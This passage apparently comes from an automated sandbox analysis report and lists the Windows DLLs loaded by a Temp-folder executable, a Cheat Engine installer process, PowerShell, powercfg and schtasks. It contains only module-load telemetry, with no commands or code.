                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: rstrtmgr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: msimg32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: oleacc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: winhttpcom.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: webio.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: schannel.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: msftedit.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: windows.globalization.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: bcp47mrm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: globinputhost.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: dataexchange.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: d3d11.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: dcomp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: dxgi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: twinapi.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: explorerframe.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: sxs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: zipfldr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: windows.fileexplorer.common.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: shdocvw.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
